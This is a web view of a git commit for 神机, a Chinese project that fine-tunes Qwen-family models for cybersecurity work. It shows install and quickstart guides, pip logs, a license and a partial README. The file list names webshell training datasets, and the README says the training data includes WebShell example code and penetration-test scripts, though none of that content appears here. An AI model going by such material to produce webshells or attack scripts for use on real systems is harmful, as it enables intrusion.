open-embodied hace 10 meses
padre
commit
7ae440bc3f
Se han modificado 97 ficheros con 8708 adiciones y 57 borrados
  1. 28 0
      =0.39.0
  2. 2 0
      =12.535.108
  3. 5 0
      =2.0.0
  4. 98 0
      INSTALL.md
  5. 205 0
      INTERACTIVE_MODEL_SELECTION.md
  6. 21 0
      LICENSE
  7. 110 0
      QUICKSTART.md
  8. 696 57
      README.md
  9. BIN
      __pycache__/download_model.cpython-310.pyc
  10. 176 0
      check_environment.py
  11. 14 0
      data/processed/additional_data.json
  12. 74 0
      data/processed/cleaned_data.json
  13. 0 0
      data/processed/dedup_alpaca_with_cot.jsonl
  14. 0 0
      data/processed/dedup_cve_dataset_sample.jsonl
  15. 0 0
      data/processed/dedup_cve_security_training.jsonl
  16. 0 0
      data/processed/dedup_eval_data.jsonl
  17. 0 0
      data/processed/dedup_hf_dataset_sample.jsonl
  18. 0 0
      data/processed/dedup_modelscope_dataset_sample.jsonl
  19. 23 0
      data/processed/dedup_modelscope_security_training.jsonl
  20. 0 0
      data/processed/dedup_poc_security_training.jsonl
  21. 0 0
      data/processed/dedup_train_data.jsonl
  22. 26 0
      data/processed/enhanced_test.json
  23. 2 0
      data/processed/enhanced_test.jsonl
  24. 0 0
      data/processed/final_security_training_dataset.jsonl
  25. 0 0
      data/processed/security_only_training_dataset.jsonl
  26. 8 0
      data/processed/test_data.json
  27. 38 0
      data/processed/training_data.json
  28. 10 0
      data/processed/webshell_dataset_sample.jsonl
  29. 1069 0
      data/processed/webshell_security_training.jsonl
  30. 236 0
      download_model.py
  31. 119 0
      examples/README.md
  32. 186 0
      examples/multi_model_example.py
  33. 5 0
      examples/sample_data.json
  34. 24 0
      logs/training_20250717_215036.log
  35. 10 0
      logs/training_20250717_234946.log
  36. 8 0
      logs/training_20250717_234951.log
  37. 26 0
      logs/training_20250717_235406.log
  38. 24 0
      logs/training_20250717_235434.log
  39. 17 0
      logs/training_20250717_235957.log
  40. 12 0
      logs/training_20250718_000101.log
  41. 62 0
      logs/training_20250718_000815.log
  42. 16 0
      logs/training_20250718_005529.log
  43. 18 0
      logs/training_20250718_005809.log
  44. 3 0
      logs/training_20250718_005814.log
  45. 31 0
      logs/training_20250718_010752.log
  46. 16 0
      logs/training_20250718_010808.log
  47. 2 0
      logs/training_20250718_010838.log
  48. 38 0
      logs/training_20250718_011032.log
  49. 24 0
      logs/training_20250718_011037.log
  50. 21 0
      main.py
  51. 38 0
      requirements.txt
  52. 366 0
      scripts/model_manager.py
  53. 11 0
      src/__init__.py
  54. BIN
      src/__pycache__/__init__.cpython-310.pyc
  55. BIN
      src/__pycache__/app.cpython-310.pyc
  56. 398 0
      src/app.py
  57. 12 0
      src/config/__init__.py
  58. BIN
      src/config/__pycache__/__init__.cpython-310.pyc
  59. BIN
      src/config/__pycache__/data_config.cpython-310.pyc
  60. BIN
      src/config/__pycache__/model_configs.cpython-310.pyc
  61. BIN
      src/config/__pycache__/settings.cpython-310.pyc
  62. BIN
      src/config/__pycache__/training_config.cpython-310.pyc
  63. 180 0
      src/config/data_config.py
  64. 177 0
      src/config/model_configs.py
  65. 109 0
      src/config/settings.py
  66. 115 0
      src/config/training_config.py
  67. 12 0
      src/data/__init__.py
  68. BIN
      src/data/__pycache__/__init__.cpython-310.pyc
  69. BIN
      src/data/__pycache__/downloader.cpython-310.pyc
  70. BIN
      src/data/__pycache__/loader.cpython-310.pyc
  71. BIN
      src/data/__pycache__/processor.cpython-310.pyc
  72. 304 0
      src/data/downloader.py
  73. 252 0
      src/data/loader.py
  74. 168 0
      src/data/processor.py
  75. 16 0
      src/model/__init__.py
  76. BIN
      src/model/__pycache__/__init__.cpython-310.pyc
  77. BIN
      src/model/__pycache__/adapters.cpython-310.pyc
  78. BIN
      src/model/__pycache__/downloader.cpython-310.pyc
  79. BIN
      src/model/__pycache__/inference.cpython-310.pyc
  80. BIN
      src/model/__pycache__/trainer.cpython-310.pyc
  81. 221 0
      src/model/adapters.py
  82. 281 0
      src/model/downloader.py
  83. 351 0
      src/model/inference.py
  84. 293 0
      src/model/trainer.py
  85. 17 0
      src/utils/__init__.py
  86. BIN
      src/utils/__pycache__/__init__.cpython-310.pyc
  87. BIN
      src/utils/__pycache__/environment.cpython-310.pyc
  88. BIN
      src/utils/__pycache__/logger.cpython-310.pyc
  89. BIN
      src/utils/__pycache__/monitor.cpython-310.pyc
  90. 350 0
      src/utils/environment.py
  91. 174 0
      src/utils/logger.py
  92. 349 0
      src/utils/monitor.py
  93. 359 0
      start_training.sh
  94. 80 0
      test_model_selection.py
  95. 171 0
      tests/README.md
  96. 9 0
      tests/__init__.py
  97. 392 0
      tests/test_runner.py

+ 28 - 0
=0.39.0

@@ -0,0 +1,28 @@
+Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple
+Requirement already satisfied: bitsandbytes in ./venv/lib/python3.10/site-packages (0.46.1)
+Requirement already satisfied: torch<3,>=2.2 in ./venv/lib/python3.10/site-packages (from bitsandbytes) (2.7.1)
+Requirement already satisfied: numpy>=1.17 in ./venv/lib/python3.10/site-packages (from bitsandbytes) (2.2.6)
+Requirement already satisfied: filelock in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (3.18.0)
+Requirement already satisfied: typing-extensions>=4.10.0 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (4.14.1)
+Requirement already satisfied: sympy>=1.13.3 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (1.14.0)
+Requirement already satisfied: networkx in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (3.4.2)
+Requirement already satisfied: jinja2 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (3.1.6)
+Requirement already satisfied: fsspec in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (2025.3.0)
+Requirement already satisfied: nvidia-cuda-nvrtc-cu12==12.6.77 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (12.6.77)
+Requirement already satisfied: nvidia-cuda-runtime-cu12==12.6.77 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (12.6.77)
+Requirement already satisfied: nvidia-cuda-cupti-cu12==12.6.80 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (12.6.80)
+Requirement already satisfied: nvidia-cudnn-cu12==9.5.1.17 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (9.5.1.17)
+Requirement already satisfied: nvidia-cublas-cu12==12.6.4.1 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (12.6.4.1)
+Requirement already satisfied: nvidia-cufft-cu12==11.3.0.4 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (11.3.0.4)
+Requirement already satisfied: nvidia-curand-cu12==10.3.7.77 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (10.3.7.77)
+Requirement already satisfied: nvidia-cusolver-cu12==11.7.1.2 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (11.7.1.2)
+Requirement already satisfied: nvidia-cusparse-cu12==12.5.4.2 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (12.5.4.2)
+Requirement already satisfied: nvidia-cusparselt-cu12==0.6.3 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (0.6.3)
+Requirement already satisfied: nvidia-nccl-cu12==2.26.2 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (2.26.2)
+Requirement already satisfied: nvidia-nvtx-cu12==12.6.77 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (12.6.77)
+Requirement already satisfied: nvidia-nvjitlink-cu12==12.6.85 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (12.6.85)
+Requirement already satisfied: nvidia-cufile-cu12==1.11.1.6 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (1.11.1.6)
+Requirement already satisfied: triton==3.3.1 in ./venv/lib/python3.10/site-packages (from torch<3,>=2.2->bitsandbytes) (3.3.1)
+Requirement already satisfied: setuptools>=40.8.0 in ./venv/lib/python3.10/site-packages (from triton==3.3.1->torch<3,>=2.2->bitsandbytes) (80.9.0)
+Requirement already satisfied: mpmath<1.4,>=1.1.0 in ./venv/lib/python3.10/site-packages (from sympy>=1.13.3->torch<3,>=2.2->bitsandbytes) (1.3.0)
+Requirement already satisfied: MarkupSafe>=2.0 in ./venv/lib/python3.10/site-packages (from jinja2->torch<3,>=2.2->bitsandbytes) (3.0.2)

+ 2 - 0
=12.535.108

@@ -0,0 +1,2 @@
+Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple
+Requirement already satisfied: nvidia-ml-py in ./venv/lib/python3.10/site-packages (12.575.51)

+ 5 - 0
=2.0.0

@@ -0,0 +1,5 @@
+Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple
+Collecting flash-attn
+  Using cached https://pypi.tuna.tsinghua.edu.cn/packages/e8/6d/7066d160bdffa2f9da29a8c3957f266b17a03ca0b3bdc8fdae86d9881fe7/flash_attn-2.8.1.tar.gz (8.2 MB)
+  Preparing metadata (setup.py): started
+  Preparing metadata (setup.py): finished with status 'error'

+ 98 - 0
INSTALL.md

@@ -0,0 +1,98 @@
+# 安装指南
+
+本指南将帮助您快速安装和配置项目所需的所有依赖。
+
+## 系统要求
+
+- Python 3.8 或更高版本
+- 至少 8GB 内存
+- 推荐使用 GPU(NVIDIA显卡)进行训练
+
+## 安装步骤
+
+### 1. 创建虚拟环境(推荐)
+
+```bash
+# 创建虚拟环境
+python -m venv venv
+
+# 激活虚拟环境
+# Windows:
+venv\Scripts\activate
+# Linux/Mac:
+source venv/bin/activate
+```
+
+### 2. 安装依赖
+
+**重要:请按照以下顺序安装,不要跳过任何步骤!**
+
+```bash
+# 方法1:一键安装所有依赖(推荐)
+pip install -r requirements.txt
+
+# 方法2:如果上述方法失败,请逐步安装
+pip install torch>=2.0.0
+pip install transformers>=4.30.0
+pip install datasets>=2.12.0
+pip install peft>=0.4.0
+pip install bitsandbytes>=0.39.0
+pip install accelerate>=0.20.0
+pip install huggingface_hub>=0.16.0
+pip install safetensors>=0.3.0
+pip install sentencepiece>=0.1.99
+pip install tokenizers>=0.13.0
+pip install tqdm>=4.65.0
+pip install requests>=2.31.0
+pip install numpy>=1.21.0
+pip install pandas>=1.5.0
+pip install modelscope>=1.9.0
+pip install psutil>=5.9.0
+```
+
+### 3. 验证安装
+
+运行以下命令检查安装是否成功:
+
+```bash
+python -c "import torch; print('PyTorch版本:', torch.__version__)"
+python -c "import transformers; print('Transformers版本:', transformers.__version__)"
+python -c "import datasets; print('Datasets安装成功')"
+```
+
+### 4. 可选依赖
+
+如果您需要实验跟踪和可视化功能,可以安装以下可选依赖:
+
+```bash
+# 实验跟踪
+pip install wandb>=0.15.0
+
+# 可视化
+pip install tensorboard>=2.10.0
+pip install matplotlib>=3.5.0
+pip install seaborn>=0.11.0
+```
+
+## 常见问题
+
+### Q: 安装 bitsandbytes 失败怎么办?
+A: 这通常是因为缺少CUDA环境。如果您没有GPU,可以跳过这个依赖,但会影响模型量化功能。
+
+### Q: 安装过程中出现网络错误?
+A: 可以使用国内镜像源:
+```bash
+pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/
+```
+
+### Q: 内存不足怎么办?
+A: 确保您的系统至少有8GB内存,并关闭其他占用内存的程序。
+
+## 下一步
+
+安装完成后,您可以:
+1. 运行 `python main.py --help` 查看可用选项
+2. 使用 `./start_training.sh --help` 查看训练脚本帮助
+3. 阅读 README.md 了解详细使用方法
+
+如果遇到问题,请检查错误信息并参考上述常见问题解答。

+ 205 - 0
INTERACTIVE_MODEL_SELECTION.md

@@ -0,0 +1,205 @@
+# 交互式模型选择功能
+
+## 功能概述
+
+现在系统支持交互式模型选择功能,在模型下载和训练时会提示用户选择要使用的模型。如果用户不输入任何内容(直接回车),系统将使用默认的 Qwen2.5-1.5B-Instruct 模型。
+
+## 支持的模型
+
+系统目前支持以下模型:
+
+1. **qwen2.5-1.5b-instruct**: Qwen2.5-1.5B-Instruct (qwen2) - 默认模型
+2. **qwen2-1.5b-instruct**: Qwen2-1.5B-Instruct (qwen2)
+3. **qwen2-7b-instruct**: Qwen2-7B-Instruct (qwen2)
+4. **chatglm3-6b**: ChatGLM3-6B (chatglm)
+5. **baichuan2-7b-chat**: Baichuan2-7B-Chat (baichuan)
+6. **llama2-7b-chat**: Llama2-7B-Chat (llama)
+
+## 使用方法
+
+### 1. 下载模型时的交互选择
+
+```bash
+python download_model.py
+```
+
+系统会显示可用模型列表,您可以:
+- 输入数字编号(1-6)选择对应模型
+- 直接输入模型键名(如 `qwen2-7b-instruct`)
+- 直接回车使用默认模型(Qwen2.5-1.5B-Instruct)
+
+### 2. 训练时的交互选择
+
+```bash
+# 不指定模型参数时,会提示选择
+python main.py --mode train
+
+# 或者直接指定模型
+python main.py --mode train --model qwen2-7b-instruct
+```
+
+### 3. 其他模式的交互选择
+
+```bash
+# 环境检查时选择模型
+python main.py --mode check
+
+# 数据准备时选择模型
+python main.py --mode data
+
+# 完整流程时选择模型
+python main.py --mode full
+```
+
+## 交互界面示例
+
+```
+=== 模型选择 ===
+可用的模型:
+  1. qwen2.5-1.5b-instruct: Qwen2.5-1.5B-Instruct (qwen2)
+  2. qwen2-1.5b-instruct: Qwen2-1.5B-Instruct (qwen2)
+  3. qwen2-7b-instruct: Qwen2-7B-Instruct (qwen2)
+  4. chatglm3-6b: ChatGLM3-6B (chatglm)
+  5. baichuan2-7b-chat: Baichuan2-7B-Chat (baichuan)
+  6. llama2-7b-chat: Llama2-7B-Chat (llama)
+
+默认模型: Qwen2.5-1.5B-Instruct (qwen2.5-1.5b-instruct)
+请选择模型 (输入数字编号,或直接回车使用默认模型):
+> 
+```
+
+## 选择方式
+
+### 1. 数字选择
+输入 `1` 到 `6` 的数字选择对应模型:
+```
+> 2
+已选择: qwen2-1.5b-instruct
+```
+
+### 2. 模型键名选择
+直接输入模型的键名:
+```
+> qwen2-7b-instruct
+已选择: qwen2-7b-instruct
+```
+
+### 3. 默认选择
+直接回车使用默认模型:
+```
+> 
+选择的模型: qwen2.5-1.5b-instruct
+```
+
+### 4. 错误处理
+如果输入无效,系统会自动使用默认模型:
+```
+> invalid_model
+未找到模型 'invalid_model',使用默认模型
+```
+
+## 模型特点
+
+### Qwen 系列
+- **qwen2.5-1.5b-instruct**: 最新版本,推荐使用,支持32K上下文
+- **qwen2-1.5b-instruct**: 稳定版本,支持32K上下文
+- **qwen2-7b-instruct**: 更大模型,性能更好但需要更多资源
+
+### 其他模型
+- **chatglm3-6b**: 清华大学开发,中文表现优秀
+- **baichuan2-7b-chat**: 百川智能开发,商用友好
+- **llama2-7b-chat**: Meta开发,开源社区广泛使用
+
+## 注意事项
+
+1. **资源需求**: 不同模型对GPU内存和计算资源的需求不同
+   - 1.5B模型:约需要4-6GB GPU内存
+   - 6-7B模型:约需要14-16GB GPU内存
+
+2. **下载时间**: 模型大小不同,下载时间也不同
+   - 1.5B模型:约3-4GB
+   - 6-7B模型:约12-14GB
+
+3. **训练时间**: 模型越大,训练时间越长
+
+4. **兼容性**: 所有模型都支持LoRA微调和量化
+
+## 后台运行建议
+
+由于模型训练通常需要较长时间,建议使用 `screen` 或 `nohup` 命令在后台运行:
+
+### 使用 screen(推荐)
+
+```bash
+# 安装 screen(如果未安装)
+sudo apt-get install screen  # Ubuntu/Debian
+sudo yum install screen      # CentOS/RHEL
+
+# 创建新的 screen 会话并运行训练
+screen -S model_training
+# 在 screen 会话中运行
+./start_training.sh --mode full
+
+# 分离会话(保持训练继续):按 Ctrl+A,然后按 D
+# 重新连接会话
+screen -r model_training
+
+# 查看所有会话
+screen -ls
+
+# 终止会话
+screen -S model_training -X quit
+```
+
+### 使用 nohup
+
+```bash
+# 后台运行并保存日志
+nohup ./start_training.sh --mode full > training.log 2>&1 &
+
+# 查看进程
+jobs
+ps aux | grep python
+
+# 查看日志
+tail -f training.log
+```
+
+## 自动化使用
+
+如果需要在脚本中自动化使用,可以通过管道输入选择:
+
+```bash
+# 选择第2个模型
+echo '2' | python download_model.py
+
+# 使用默认模型
+echo '' | python main.py --mode train
+
+# 直接指定模型(推荐)
+python main.py --mode train --model qwen2-7b-instruct
+
+# 结合 screen 使用
+screen -dmS training bash -c "echo '1' | ./start_training.sh --mode full"
+```
+
+## 故障排除
+
+如果遇到问题:
+
+1. **模型列表不显示**: 检查 `src/config/model_configs.py` 文件
+2. **选择无效**: 确保输入的是有效的数字或模型键名
+3. **下载失败**: 检查网络连接和存储空间
+4. **训练失败**: 确保选择的模型与您的硬件资源匹配
+
+## 测试功能
+
+可以使用测试脚本验证功能:
+
+```bash
+# 测试交互式选择功能
+python test_model_selection.py
+
+# 自动化测试
+echo '1' | python test_model_selection.py
+```

+ 21 - 0
LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2025 jinghunsanzu
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

+ 110 - 0
QUICKSTART.md

@@ -0,0 +1,110 @@
+# 🚀 5分钟快速开始
+
+本指南将帮助您在5分钟内快速上手Qwen安全模型训练项目。
+
+## 第一步:环境检查 (1分钟)
+
+```bash
+# 检查环境是否就绪
+python check_environment.py
+```
+
+如果检查失败,请按照提示安装缺失的依赖:
+```bash
+pip install -r requirements.txt
+```
+
+## 第二步:查看可用选项 (1分钟)
+
+```bash
+# 查看所有可用的命令选项
+./start_training.sh --help
+
+# 或者
+python main.py --help
+```
+
+## 第三步:选择运行模式 (3分钟)
+
+### 🔍 模式1:环境检查
+```bash
+./start_training.sh --mode check
+```
+
+### 📊 模式2:数据准备
+```bash
+./start_training.sh --mode data
+```
+
+### 🤖 模式3:模型训练
+```bash
+# 使用默认模型训练
+./start_training.sh --mode train
+
+# 选择特定模型训练
+./start_training.sh --mode train --model qwen2-1.5b
+
+# 继续之前的训练
+./start_training.sh --mode train --resume
+```
+
+### 🧪 模式4:模型测试
+```bash
+./start_training.sh --mode test
+```
+
+### 💬 模式5:交互模式
+```bash
+./start_training.sh --mode interactive
+```
+
+### 🔄 模式6:完整流程
+```bash
+# 一键运行:数据准备 → 训练 → 测试
+./start_training.sh --mode full
+```
+
+## 常用命令组合
+
+### 新手推荐:完整流程
+```bash
+# 第一次使用,运行完整流程
+./start_training.sh --mode full
+```
+
+### 进阶用户:自定义训练
+```bash
+# 查看支持的模型
+./start_training.sh --list-models
+
+# 使用特定模型训练
+./start_training.sh --mode train --model qwen2-7b
+
+# 从检查点继续训练
+./start_training.sh --mode train --resume-from ./checkpoints/checkpoint-1000
+```
+
+## 📁 重要目录说明
+
+- `data/processed/` - 处理后的训练数据
+- `models/` - 下载的预训练模型
+- `checkpoints/` - 训练检查点
+- `output/` - 训练输出和微调后的模型
+- `logs/` - 训练日志
+
+## 🆘 遇到问题?
+
+1. **环境问题**:运行 `python check_environment.py`
+2. **依赖问题**:查看 [INSTALL.md](INSTALL.md)
+3. **使用问题**:查看 [README.md](README.md)
+4. **错误信息**:检查 `logs/` 目录下的日志文件
+
+## 🎯 下一步
+
+- 阅读 [README.md](README.md) 了解详细功能
+- 查看 [examples/](examples/) 目录的示例代码
+- 自定义配置文件进行高级训练
+
+---
+
+**提示**:首次运行建议使用 `--mode full` 体验完整流程!

+ 696 - 57
README.md

@@ -1,92 +1,731 @@
-# project0802shenji
+# 神机 - 网络安全大模型训练系统
+
+神机是一个专门针对网络安全领域的AI大模型训练系统,默认基于Qwen2.5模型进行LoRA微调。兼容大部分大模型。由云霖网络安全实验室开发,采用模块化架构设计,具备完整的身份认知和专业的网络安全知识体系。本项目当中已经包含5万多条训练数据,默认即可开始训练自身的数据
+
+## 🚀 功能特点
+
+### 核心功能
+- **神机身份认知**: 模型具备完整的"神机"身份认知,由云霖网络安全实验室训练
+- **动态身份设置**: 支持在推理时动态设置模型身份,无需修改模型文件
+- **网络安全专精**: 专门针对网络安全、渗透测试、代码审计等场景优化
+- **全自动化训练**: 一键启动,自动完成数据下载、环境配置、模型训练全流程
+- **统一测试框架**: 集成化测试系统,支持多种测试场景
+- **小显存优化**: 针对6GB显存进行优化,支持LoRA微调
+- **中文理解**: 增强中文网络安全术语和概念的理解能力
+- **实时监控**: 提供训练进度监控和系统状态监控
+- **模块化架构**: 采用分层架构,代码结构清晰,易于维护和扩展
+
+### 技术特性
+- 默认基于Qwen2.5-1.5B模型
+- LoRA (Low-Rank Adaptation) 微调技术
+- Chat Template动态身份设置
+- 支持ModelScope和HuggingFace双源下载
+- 自动混合精度训练 (FP16)
+- 梯度累积和检查点保存
+- 多数据源融合训练
+- 统一测试框架
+- 模块化设计,易于扩展
+
+## 📋 系统要求
+
+### 最低硬件要求
+- **GPU**: NVIDIA P106-100 6GB 或更高
+- **内存**: 16GB+ 推荐
+- **存储**: 50GB+ 可用空间
+- **网络**: 稳定的网络连接(用于下载模型和数据)
+
+### 软件要求
+- **操作系统**: Linux (Ubuntu 18.04+)
+- **Python**: 3.8+
+- **CUDA**: 11.0+
+- **其他**: screen, git
+
+## 🚀 快速开始
+
+### ⚡ 5分钟快速上手
+
+**新用户推荐**: 查看 [5分钟快速开始指南](QUICKSTART.md) 快速上手!
+
+### 1. 环境准备
+
+```bash
+# 克隆或下载项目文件
+cd /qwen
+
+# 给启动脚本执行权限
+chmod +x start_training.sh
+
+# 安装系统依赖
+sudo apt-get update
+sudo apt-get install -y screen python3-venv python3-pip
+```
+
+### 2. 环境检查(推荐)
+
+```bash
+# 🔍 一键检查环境是否就绪
+python check_environment.py
+
+# 或使用启动脚本进行环境检查
+./start_training.sh --mode check
+```
+
+如果环境检查失败,请按照提示安装缺失的依赖:
+```bash
+pip install -r requirements.txt
+```
+
+### 3. 一键启动训练
+
+```bash
+# 启动自动化训练(推荐)
+bash start_training.sh
+```
+
+这个脚本会自动完成:
+- 创建Python虚拟环境
+- 安装所有依赖包
+- 下载和处理训练数据
+- 启动后台训练
+- 设置监控和日志
+
+### 4. 自定义训练数据(可选)
+
+#### 放置数据文件
+将你的训练数据文件放在:
+- **自动加载模式**:`/qwen/data/processed/` 目录下的任意 `.json`  `.jsonl` 文件
+- **指定文件模式**:`/qwen/data/processed/your_custom_name.json`
+
+#### 程序自动加载
+- **默认行为**:程序会自动扫描并加载 `/qwen/data/processed/` 目录下的所有 `.json` `.jsonl` 文件
+- **多文件支持**:可以同时放置多个训练文件,程序会自动合并所有数据
+- **指定文件**:如需加载特定文件,可在训练时指定文件名
+
+#### 数据文件格式
+训练数据应为JSON、.jsonl格式,支持以下两种结构:
+
+**方式1:对话格式(推荐)**
+```json
+[
+  {
+    "text": "<|im_start|>system\n你是一个网络安全专家...<|im_end|>\n<|im_start|>user\n如何进行SQL注入测试?<|im_end|>\n<|im_start|>assistant\nSQL注入测试的步骤包括...<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个编程专家...<|im_end|>\n<|im_start|>user\n编写一个端口扫描器<|im_end|>\n<|im_start|>assistant\n以下是端口扫描器的代码...<|im_end|>"
+  }
+]
+```
+
+**方式2:指令格式**
+```json
+[
+  {
+    "instruction": "如何进行SQL注入测试?",
+    "input": "",
+    "output": "SQL注入测试的步骤包括...",
+    "category": "security"
+  }
+]
+```
+
+**使用示例:**
+```bash
+# 创建数据目录
+mkdir -p /qwen/data/processed
+
+# 放置多个训练文件
+cp my_security_data.json /qwen/data/processed/
+cp my_code_data.json /qwen/data/processed/
+cp my_custom_data.json /qwen/data/processed/
+
+# 启动训练(自动加载所有文件)
+./start_training.sh --mode train
+```
+
+### 3. 详细使用方法
+
+#### 启动脚本选项
+```bash
+# 显示帮助
+./start_training.sh --help
+
+# 完整训练流程 (默认)
+./start_training.sh
+./start_training.sh --mode full
+
+# 仅数据下载和处理
+./start_training.sh --mode data
+
+# 强制重新下载数据
+./start_training.sh --mode data --force-download
+
+# 仅模型训练
+./start_training.sh --mode train
+
+# 仅模型测试
+./start_training.sh --mode test
+
+# 交互式对话
+./start_training.sh --mode interactive
+
+# 环境检查
+./start_training.sh --mode check
+
+# 详细的依赖检查
+python check_dependencies.py
+```
+
+#### 直接使用Python
+```bash
+# 设置Python路径
+export PYTHONPATH="$PWD/src:$PYTHONPATH"
+
+# 运行主程序
+python main.py --mode full
+python main.py --mode data
+python main.py --mode train
+python main.py --mode test
+python main.py --mode interactive
+```
+
+#### 监控训练
+```bash
+# 查看screen会话
+screen -r security_model_training
+
+# 查看日志
+tail -f logs/training_*.log
+
+# 监控系统状态
+python -c "from src.utils.monitor import TrainingMonitor; m=TrainingMonitor(); print(m.get_current_status())"
+```
+
+## 📁 项目结构
+
+```
+qwen/
+├── requirements.txt          # Python依赖包
+├── requirements-basic.txt    # 基础依赖包
+├── main.py                  # 主程序入口
+├── start_training.sh        # 启动脚本
+├── download_model.py        # 模型下载脚本
+├── check_environment.py     # 环境检查脚本
+├── README.md               # 项目说明文档
+├── QUICKSTART.md           # 5分钟快速开始指南
+├── INSTALL.md              # 详细安装指南
+├── identity_solution_guide.md # 身份解决方案说明
+├── src/                    # 源代码目录
+│   ├── __init__.py         # 包初始化
+│   ├── app.py              # 主应用程序
+│   ├── config/             # 配置模块
+│   │   ├── __init__.py
+│   │   ├── settings.py     # 基础配置
+│   │   ├── training_config.py  # 训练配置
+│   │   └── data_config.py  # 数据配置(含神机身份模板)
+│   ├── data/               # 数据处理模块
+│   │   ├── __init__.py
+│   │   ├── downloader.py   # 数据下载器
+│   │   ├── processor.py    # 数据处理器
+│   │   └── loader.py       # 数据加载器
+│   ├── model/              # 模型管理模块
+│   │   ├── __init__.py
+│   │   ├── downloader.py   # 模型下载器
+│   │   ├── trainer.py      # 模型训练器
+│   │   └── inference.py    # 模型推理器(支持动态身份)
+│   └── utils/              # 工具模块
+│       ├── __init__.py
+│       ├── logger.py       # 日志工具
+│       ├── environment.py  # 环境检查
+│       └── monitor.py      # 训练监控
+├── tests/                  # 统一测试框架
+│   ├── __init__.py         # 测试模块初始化
+│   ├── test_runner.py      # 统一测试运行器
+│   └── README.md          # 测试框架说明
+├── examples/               # 示例数据和使用案例
+│   ├── sample_data.json    # 示例训练数据
+│   └── README.md          # 示例使用说明
+├── data/                   # 数据目录
+│   └── processed/         # 处理后数据
+│       ├── final_security_training_dataset.jsonl
+│       ├── security_only_training_dataset.jsonl
+│       ├── enhanced_test.jsonl
+│       └── ...            # 其他训练数据
+├── models/                # 模型目录
+│   └── Qwen_Qwen2.5-1.5B-Instruct/  # 基础模型
+│       ├── config.json
+│       ├── tokenizer_config.json  # 包含神机身份模板
+│       └── ...            # 其他模型文件
+├── checkpoints/           # 训练检查点
+│   └── checkpoint-6/      # LoRA适配器
+│       ├── adapter_model.safetensors
+│       ├── chat_template.jinja  # 神机身份模板
+│       └── ...            # 其他检查点文件
+├── logs/                  # 日志目录
+├── cache/                 # 缓存目录
+├── output/                # 输出目录
+└── venv/                  # Python虚拟环境
+```
+
+## 🔧 配置说明
+
+### 配置文件结构
+
+配置采用模块化设计,分为三个主要部分:
+
+#### 1. 基础配置 (src/config/settings.py)
+```python
+class Config:
+    # 项目路径配置
+    PROJECT_ROOT = "/path/to/project"
+    DATA_DIR = "data"
+    MODEL_DIR = "models"
+    
+    # 模型配置
+    BASE_MODEL_NAME = "Qwen/Qwen2-1.5B"
+    USE_MODELSCOPE = True
+    DEVICE = "cuda" if torch.cuda.is_available() else "cpu"
+```
+
+#### 2. 训练配置 (src/config/training_config.py)
+```python
+class TrainingConfig:
+    # 训练参数
+    batch_size = 2
+    learning_rate = 2e-4
+    num_epochs = 3
+    max_length = 2048
+    
+class LoRAConfig:
+    # LoRA参数
+    r = 16
+    alpha = 32
+    dropout = 0.1
+```
+
+#### 3. 数据配置 (src/config/data_config.py)
+```python
+class DataConfig:
+    # 数据处理参数
+    max_samples_per_source = 1000
+    train_test_split = 0.8
+    min_length = 10
+    max_length = 2048
+```
+
+### 数据源配置
+
+系统会自动从以下来源获取训练数据:
+- 网络安全知识库
+- 代码数据集
+- 中文对话数据
+- WebShell示例代码
+- 渗透测试脚本
+
+## 🔧 高级用法
+
+### 自定义配置
+
+1. **修改训练参数**
+```python
+# 编辑 src/config/training_config.py
+class TrainingConfig:
+    batch_size = 4          # 增加批次大小
+    learning_rate = 1e-4    # 降低学习率
+    num_epochs = 5          # 增加训练轮数
+```
+
+2. **添加自定义数据源**
+```python
+# 在 src/data/downloader.py 中添加数据源
+class DataDownloader:
+    def download_custom_data(self):
+        custom_data = [
+            {
+                "instruction": "你的指令",
+                "input": "输入内容",
